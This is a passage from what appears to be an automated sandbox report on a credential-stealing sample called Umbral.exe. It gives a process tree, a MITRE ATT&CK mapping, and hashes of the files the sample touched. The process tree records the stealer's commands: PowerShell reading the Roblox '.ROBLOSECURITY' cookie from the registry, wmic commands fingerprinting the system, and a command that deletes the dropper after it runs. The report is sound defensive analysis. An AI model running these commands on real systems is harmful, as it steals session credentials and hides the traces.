                                                                        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                        3⤵
                                                                        • Command and Scripting Interpreter: PowerShell
                                                                        • Loads dropped DLL
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:448
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                        3⤵
                                                                        • Loads dropped DLL
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:4008
                                                                      • C:\Windows\System32\Wbem\wmic.exe
                                                                        "wmic.exe" os get Caption
                                                                        3⤵
                                                                        • Loads dropped DLL
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:4820
                                                                      • C:\Windows\System32\Wbem\wmic.exe
                                                                        "wmic.exe" computersystem get totalphysicalmemory
                                                                        3⤵
                                                                        • Loads dropped DLL
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:2428
                                                                      • C:\Windows\System32\Wbem\wmic.exe
                                                                        "wmic.exe" csproduct get uuid
                                                                        3⤵
                                                                        • Loads dropped DLL
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:3952
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                        3⤵
                                                                        • Command and Scripting Interpreter: PowerShell
                                                                        • Loads dropped DLL
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:5000
                                                                      • C:\Windows\System32\Wbem\wmic.exe
                                                                        "wmic" path win32_VideoController get name
                                                                        3⤵
                                                                        • Loads dropped DLL
                                                                        • Detects videocard installed
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:3256
                                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                                        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
                                                                        3⤵
                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                        PID:2480
                                                                        • C:\Windows\system32\PING.EXE
                                                                          ping localhost
                                                                          4⤵
                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                          • Runs ping.exe
                                                                          PID:4408
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                    1⤵
                                                                    • Loads dropped DLL
                                                                    • Enumerates system info in registry
                                                                    • Modifies data under HKEY_USERS
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                    • Suspicious use of FindShellTrayWindow
                                                                    • Suspicious use of SendNotifyMessage
                                                                    PID:4560
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffb85aecc40,0x7ffb85aecc4c,0x7ffb85aecc58
                                                                      2⤵
                                                                      • Loads dropped DLL
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      PID:1928
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1760,i,7846881907835535761,18432916530599397275,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1756 /prefetch:2
                                                                      2⤵
                                                                        PID:4904
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2100,i,7846881907835535761,18432916530599397275,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2228 /prefetch:3
                                                                        2⤵
                                                                        • Loads dropped DLL
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:744
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2288,i,7846881907835535761,18432916530599397275,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2236 /prefetch:8
                                                                        2⤵
                                                                          PID:3440
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3148,i,7846881907835535761,18432916530599397275,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3168 /prefetch:1
                                                                          2⤵
                                                                            PID:2968
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3176,i,7846881907835535761,18432916530599397275,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3200 /prefetch:1
                                                                            2⤵
                                                                              PID:5024
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3748,i,7846881907835535761,18432916530599397275,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4492 /prefetch:1
                                                                              2⤵
                                                                                PID:2372
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4768,i,7846881907835535761,18432916530599397275,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4868 /prefetch:8
                                                                                2⤵
                                                                                • Loads dropped DLL
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                PID:436
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4872,i,7846881907835535761,18432916530599397275,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4860 /prefetch:8
                                                                                2⤵
                                                                                  PID:1564
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4912,i,7846881907835535761,18432916530599397275,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5144 /prefetch:8
                                                                                  2⤵
                                                                                    PID:4792
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5212,i,7846881907835535761,18432916530599397275,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5220 /prefetch:8
                                                                                    2⤵
                                                                                      PID:872
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5056,i,7846881907835535761,18432916530599397275,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5200 /prefetch:8
                                                                                      2⤵
                                                                                        PID:4344
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5084,i,7846881907835535761,18432916530599397275,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5244 /prefetch:8
                                                                                        2⤵
                                                                                          PID:4444
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5052,i,7846881907835535761,18432916530599397275,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4892 /prefetch:2
                                                                                          2⤵
                                                                                            PID:4820
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5160,i,7846881907835535761,18432916530599397275,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4152 /prefetch:1
                                                                                            2⤵
                                                                                              PID:4416
                                                                                          • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                                                            1⤵
                                                                                            • Loads dropped DLL
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            PID:2640
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                                            1⤵
                                                                                            • Loads dropped DLL
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            PID:4004

                                                                                          Network

                                                                                          MITRE ATT&CK Enterprise v15

                                                                                          Reconnaissance

                                                                                          Resource Development

                                                                                          Initial Access

                                                                                          Execution

                                                                                          Command and Scripting Interpreter

                                                                                          1
                                                                                          T1059

                                                                                          PowerShell

                                                                                          1
                                                                                          T1059.001

                                                                                          Scheduled Task/Job

                                                                                          1
                                                                                          T1053

                                                                                          Scheduled Task

                                                                                          1
                                                                                          T1053.005

                                                                                          Persistence

                                                                                          Boot or Logon Autostart Execution

                                                                                          2
                                                                                          T1547

                                                                                          Registry Run Keys / Startup Folder

                                                                                          1
                                                                                          T1547.001

                                                                                          Winlogon Helper DLL

                                                                                          1
                                                                                          T1547.004

                                                                                          Event Triggered Execution

                                                                                          1
                                                                                          T1546

                                                                                          AppInit DLLs

                                                                                          1
                                                                                          T1546.010

                                                                                          Scheduled Task/Job

                                                                                          1
                                                                                          T1053

                                                                                          Scheduled Task

                                                                                          1
                                                                                          T1053.005

                                                                                          Privilege Escalation

                                                                                          Boot or Logon Autostart Execution

                                                                                          2
                                                                                          T1547

                                                                                          Registry Run Keys / Startup Folder

                                                                                          1
                                                                                          T1547.001

                                                                                          Winlogon Helper DLL

                                                                                          1
                                                                                          T1547.004

                                                                                          Event Triggered Execution

                                                                                          1
                                                                                          T1546

                                                                                          AppInit DLLs

                                                                                          1
                                                                                          T1546.010

                                                                                          Scheduled Task/Job

                                                                                          1
                                                                                          T1053

                                                                                          Scheduled Task

                                                                                          1
                                                                                          T1053.005

                                                                                          Defense Evasion

                                                                                          Hide Artifacts

                                                                                          1
                                                                                          T1564

                                                                                          Hidden Files and Directories

                                                                                          1
                                                                                          T1564.001

                                                                                          Modify Registry

                                                                                          2
                                                                                          T1112

                                                                                          Credential Access

                                                                                          Credentials from Password Stores

                                                                                          1
                                                                                          T1555

                                                                                          Credentials from Web Browsers

                                                                                          1
                                                                                          T1555.003

                                                                                          Unsecured Credentials

                                                                                          1
                                                                                          T1552

                                                                                          Credentials In Files

                                                                                          1
                                                                                          T1552.001

                                                                                          Discovery

                                                                                          Browser Information Discovery

                                                                                          1
                                                                                          T1217

                                                                                          Query Registry

                                                                                          3
                                                                                          T1012

                                                                                          Remote System Discovery

                                                                                          1
                                                                                          T1018

                                                                                          System Information Discovery

                                                                                          4
                                                                                          T1082

                                                                                          System Location Discovery

                                                                                          1
                                                                                          T1614

                                                                                          System Language Discovery

                                                                                          1
                                                                                          T1614.001

                                                                                          System Network Configuration Discovery

                                                                                          1
                                                                                          T1016

                                                                                          Internet Connection Discovery

                                                                                          1
                                                                                          T1016.001

                                                                                          Lateral Movement

                                                                                          Collection

                                                                                          Data from Local System

                                                                                          1
                                                                                          T1005

                                                                                          Command and Control

                                                                                          Web Service

                                                                                          1
                                                                                          T1102

                                                                                          Exfiltration

                                                                                          Impact

                                                                                          Replay Monitor

                                                                                          Loading Replay Monitor...

                                                                                          Downloads

                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState
                                                                                            Filesize

                                                                                            649B

                                                                                            MD5

                                                                                            310f9cb6f9fdb327b984d09bdb092dd1

                                                                                            SHA1

                                                                                            6e934659870c4ebf605718eed82c01237ce004f8

                                                                                            SHA256

                                                                                            1eaf22e316ac4d1f12afba87f3f04d1763df9def1af1ea44d039d1fd16ff8013

                                                                                            SHA512

                                                                                            f727bdd2c7d14844a00e97093a82f090dbcdbf2da585b1496d03891d43b07cbde67659670ea1eb2180919a7aee0417503f039d071779c6fbdab800a41e6ea592

                                                                                            Download Submit

                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000005
                                                                                            Filesize

                                                                                            215KB

                                                                                            MD5

                                                                                            d79b35ccf8e6af6714eb612714349097

                                                                                            SHA1

                                                                                            eb3ccc9ed29830df42f3fd129951cb8b791aaf98

                                                                                            SHA256

                                                                                            c8459799169b81fdab64d028a9ebb058ea2d0ad5feb33a11f6a45a54a5ccc365

                                                                                            SHA512

                                                                                            f4be1c1e192a700139d7cff5059af81c0234ed5f032796036a1a4879b032ce4eedd16a121bbf776f17bc84a0012846f467ad48b46db4008841c25b779c7d8f5a

                                                                                            Download Submit

                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
                                                                                            Filesize

                                                                                            216B

                                                                                            MD5

                                                                                            6054b021ae777bb10e0a8e4927d74bcb

                                                                                            SHA1

                                                                                            3a49b8c37abd69b51075580311e1c98b2c925fe7

                                                                                            SHA256

                                                                                            01563d123a323a1fff0d18a0795bbd2a7a28744a924344cb66e549a0f4532328

                                                                                            SHA512

                                                                                            f787174dbcfc35d166b1de1241f7cd47e5d8c851880ac55c5d1b951214f127355c043a98e34677c4d02dc650d9fbdf43c911a4f1319fbb5489a3ea2985d6780a

                                                                                            Download Submit

                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.85.1_0\_locales\en\messages.json
                                                                                            Filesize

                                                                                            851B

                                                                                            MD5

                                                                                            07ffbe5f24ca348723ff8c6c488abfb8

                                                                                            SHA1

                                                                                            6dc2851e39b2ee38f88cf5c35a90171dbea5b690

                                                                                            SHA256

                                                                                            6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c

                                                                                            SHA512

                                                                                            7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

                                                                                            Download Submit

                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.85.1_0\dasherSettingSchema.json
                                                                                            Filesize

                                                                                            854B

                                                                                            MD5

                                                                                            4ec1df2da46182103d2ffc3b92d20ca5

                                                                                            SHA1

                                                                                            fb9d1ba3710cf31a87165317c6edc110e98994ce

                                                                                            SHA256

                                                                                            6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6

                                                                                            SHA512

                                                                                            939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

                                                                                            Download Submit

                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
                                                                                            Filesize

                                                                                            356B

                                                                                            MD5

                                                                                            bba973d6129dfd3b0fd8b5e4bc1098dd

                                                                                            SHA1

                                                                                            b73227b24c3bd35e2ded80f7128b37aa17e7bf1b

                                                                                            SHA256

                                                                                            e0a387432ae76a581ca08a61e28be2dc2dc3519863d4c0069d9d546dba8a6689

                                                                                            SHA512

                                                                                            bca9d4e7e5d12ab98b33e8fd3f56153cdc70e74d37fa8e3c5dcf76d84bdc6df138de437da95711191e2a03a5361e5d784f21730620f7827aff01f24a6c9a149a

                                                                                            Download Submit

                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
                                                                                            Filesize

                                                                                            356B

                                                                                            MD5

                                                                                            1ffa31c768006d2b733c16fc01de35ff

                                                                                            SHA1

                                                                                            f2a1ce7fdd81c8800b234ed44c61bf453562101a

                                                                                            SHA256

                                                                                            137f8ec0ac040dc794fcfcbe2793a82d59a8638c38fb8de3bc6ac6ab2eda32c2

                                                                                            SHA512

                                                                                            c5b8f7cb336263bb6abd812c47e9579c30eef177a23587fd88e0a8ec780613201d61e27ca63d6fcbd014fa006ee005e46b79fb12de8cb4567f4ff509739a4918

                                                                                            Download Submit

                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\c787ff19-60b6-4237-9dfa-3c0065614f93.tmp
                                                                                            Filesize

                                                                                            2B

                                                                                            MD5

                                                                                            d751713988987e9331980363e24189ce

                                                                                            SHA1

                                                                                            97d170e1550eee4afc0af065b78cda302a97674c

                                                                                            SHA256

                                                                                            4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                            SHA512

                                                                                            b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                                            Download Submit

                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                                                                            Filesize

                                                                                            9KB

                                                                                            MD5

                                                                                            1a3f431067f2c384ecda996ff25993c9

                                                                                            SHA1

                                                                                            cb8e60dadd4eae75dff389e6c08b225baeb456f8

                                                                                            SHA256

                                                                                            3573d6a0bd11feddad693a43ea5d743472a956dd42713cf97a406d9a0c65b5a6

                                                                                            SHA512

                                                                                            a81c5d449b3854c68d8d2cef004c0b2d77bca60f3abb750784b5dd4da050a073f060e1b04cfb8e69e55b53f19056e4ed39972ec7004dfb2d323abf9f9a7bcbef

                                                                                            Download Submit

                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                                                                            Filesize

                                                                                            9KB

                                                                                            MD5

                                                                                            c14d58aae9a3c7a93fcd2ea24004b9c0

                                                                                            SHA1

                                                                                            b866b29dff59a21dcc58787eedf1d8e79437d86d

                                                                                            SHA256

                                                                                            4cc4591b349f99d80eaf0d1342c8c0f3d215f66603a2053a4e857b4840237ba8

                                                                                            SHA512

                                                                                            5219e757dabc5974623c7881f92590c79892106caaa6a474101134dcaf57fc2f4e41399daea4d23053ed3bd2034e5ae56d8306a2133fc771800ec607723be84f

                                                                                            Download Submit

                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                                                                            Filesize

                                                                                            9KB

                                                                                            MD5

                                                                                            bfc54c4b9f7c3848c0952e54cc19ae13

                                                                                            SHA1

                                                                                            a1442052395021c7081c19bee5d358479cd99bd5

                                                                                            SHA256

                                                                                            9780416612ba3f04e57871b0b7c71d6bc54c4cf84cdfb09eb99d6fd9c1af4a98

                                                                                            SHA512

                                                                                            f5db2a71ff2e3e64b0dd3ec34fdf0cd8b983882efe000f427e2e141965ba5287fb79ddef0a680c6255fde79b674c3d8651b1287bceaab3e9dfdc048e4b2c1d5c

                                                                                            Download Submit

                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                                                                            Filesize

                                                                                            9KB

                                                                                            MD5

                                                                                            646c5d4f0c213dc1f5d9380e0a45ea3f

                                                                                            SHA1

                                                                                            c8441b4ed66190dbe56f0b4ebc6d1e98440f6612

                                                                                            SHA256

                                                                                            dec6a70628d4511bc1d8d13cb05d4eaeeae09d60dc0b4f9056162b84b78fa47d

                                                                                            SHA512

                                                                                            583e9793941d3362c5428f63a3e97ebd59373122efb0a148a5662c6bb11e24163f06b24d32e38d71d825a3257284284607afab4bca131af5e8c0d6d77ec91121

                                                                                            Download Submit

                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
                                                                                            Filesize

                                                                                            15KB

                                                                                            MD5

                                                                                            442399c3077c06e63b164ec638fca0f9

                                                                                            SHA1

                                                                                            5d4a9df704169d4e428b3f5e42f0c3a6eeb25bbf

                                                                                            SHA256

                                                                                            dad2f1d5f9db6a51a886edf3675e96b18af97663f5e0dd402402b021eda52816

                                                                                            SHA512

                                                                                            a46969ad557e192c90a7229490c80dc23bd95e7bddf175020437b4072bee3a46c1288c52c3385766bd3b4967dd65bb699e4b6ec552685d10046ce39177d2f242

                                                                                            Download Submit

                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
                                                                                            Filesize

                                                                                            72B

                                                                                            MD5

                                                                                            3b0901a72a85b26a82658a1e955c32ec

                                                                                            SHA1

                                                                                            1e54572be041bf48451c1f9653d4d48f381374bf

                                                                                            SHA256

                                                                                            1d8d23096eb217b29db416cd3f1c6aa72007bdc5afcf5e2e317187e6001a2c89

                                                                                            SHA512

                                                                                            dbb0c1b25abe05801f5867c758cd9853651b6cdd56da0b979288effa6c1d9d50d84975616a4f8196679eacca0b78b74d344c8e9f3ab009604b775e33c3a40304

                                                                                            Download Submit

                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
                                                                                            Filesize

                                                                                            229KB

                                                                                            MD5

                                                                                            306e044fce6b75dfef13ae15053fae86

                                                                                            SHA1

                                                                                            69028cc1b071111dfdfe98b94c45cfcb7ebd947a

                                                                                            SHA256

                                                                                            e1339cd96dee5885e5d6e9f96053fbbd4d02f61b72c6af4712bd1fcc170b3c4f

                                                                                            SHA512

                                                                                            0c75d4debcfcda6a18533d547e4753e0aae9480b0c60c1fb6ea2b27161db5edf7bc30f19d3045604d823aa53427cc73abf3bdbfc117d13a2c1b3dc4d058c2be1

                                                                                            Download Submit

                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
                                                                                            Filesize

                                                                                            229KB

                                                                                            MD5

                                                                                            55d069a9a33ec2b1e5d75e5d5617c4c6

                                                                                            SHA1

                                                                                            4a25583363ebadef9dd0348c7981f9b9f9e27435

                                                                                            SHA256

                                                                                            2670e942a699d10d41fed44a7ee4fef490ba30d1c8ebd0167a338d4861a73174

                                                                                            SHA512

                                                                                            14c6a43eedfbe81f23260da56f064fc620125527103f4141d94a0d40658e4cf9ba796929665ce320ba1b420d1b36722983e62aa98ee3c31eae764f244e82890f

                                                                                            Download Submit

                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Umbral.exe.log
                                                                                            Filesize

                                                                                            1KB

                                                                                            MD5

                                                                                            547df619456b0e94d1b7663cf2f93ccb

                                                                                            SHA1

                                                                                            8807c99005eaf2cc44b0b5ec4fc6eac289bfb4e3

                                                                                            SHA256

                                                                                            8b7130cc966f3f78e236b4e51eb12e1c82b0bd3f0773275d619b5c545168797a

                                                                                            SHA512

                                                                                            01b4e32fdf6c7f2347075c8153bc75a2f32fe3cec19e1a777e263ec4f607b54e046f0e4c7c0bc22581d44cbbdbb076a63eaa50a742f381faad06c86c2b10f67f

                                                                                            Download Submit

                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                                            Filesize

                                                                                            2KB

                                                                                            MD5

                                                                                            d85ba6ff808d9e5444a4b369f5bc2730

                                                                                            SHA1

                                                                                            31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                                            SHA256

                                                                                            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                                            SHA512

                                                                                            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                                            Download Submit

                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                            Filesize

                                                                                            944B

                                                                                            MD5

                                                                                            62623d22bd9e037191765d5083ce16a3

                                                                                            SHA1

                                                                                            4a07da6872672f715a4780513d95ed8ddeefd259

                                                                                            SHA256

                                                                                            95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010

                                                                                            SHA512

                                                                                            9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

                                                                                            Download Submit

                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                            Filesize

                                                                                            948B

                                                                                            MD5

                                                                                            07d142044fb78e359c794180a9c6fdff

                                                                                            SHA1

                                                                                            8a7155f93a53ff1b7f382a4ccb3f58ff2f88808e

                                                                                            SHA256

                                                                                            2af8c3ca529953085ca25f69d9142964e2ce5508665c14f3533a47d254fed3ea

                                                                                            SHA512

                                                                                            356edd3598c09b765c3de325bc47c5c8ae7fcfd87e8c58e12e8bb6437f1d7ce58310e06c4d64336815833e280f2e61c288edb09508c4f29876d28b0d602aeb78

                                                                                            Download Submit

                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                            Filesize

                                                                                            1KB

                                                                                            MD5

                                                                                            276798eeb29a49dc6e199768bc9c2e71

                                                                                            SHA1

                                                                                            5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

                                                                                            SHA256

                                                                                            cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

                                                                                            SHA512

                                                                                            0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

                                                                                            Download Submit

                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                            Filesize

                                                                                            1KB

                                                                                            MD5

                                                                                            e4d5f16dff1c6c4bd78c48253f411da2

                                                                                            SHA1

                                                                                            0fb7366585572b2cf4144d169302ba21d8e71ac3

                                                                                            SHA256

                                                                                            360fe2bf9d46f0e6bb35c1b41ba0d70c5f10a1a9b42e29d9cafea37de5964133

                                                                                            SHA512

                                                                                            27cb84814bf84d0db623e68c06b6391e63d985d5fe77a9d6ca9093329fbe73da490bb9bef67fea667d2d03b1d42ed5b4591f9e72c281c15965d0765c019d4b69

                                                                                            Download Submit

                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                            Filesize

                                                                                            64B

                                                                                            MD5

                                                                                            c41224ab6e2a713aff7b0128890716be

                                                                                            SHA1

                                                                                            b3525f9c3f583284b084fb88ae14a803fad84e04

                                                                                            SHA256

                                                                                            ee0f2a4ee399ef57c54d83bd611d11fb22ce2edc405db819a2a371b8a5192fd2

                                                                                            SHA512

                                                                                            25c71ac3f2ee6b0ccadd7549b7d8a42a964d0305d8758dfae53ce78eeaf52432380715ff545d95645e0e00d3b3b6c678f17eb16b2e9606d64988ffde82dfbc4c

                                                                                            Download Submit

                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                            Filesize

                                                                                            944B

                                                                                            MD5

                                                                                            96ff1ee586a153b4e7ce8661cabc0442

                                                                                            SHA1

                                                                                            140d4ff1840cb40601489f3826954386af612136

                                                                                            SHA256

                                                                                            0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8

                                                                                            SHA512

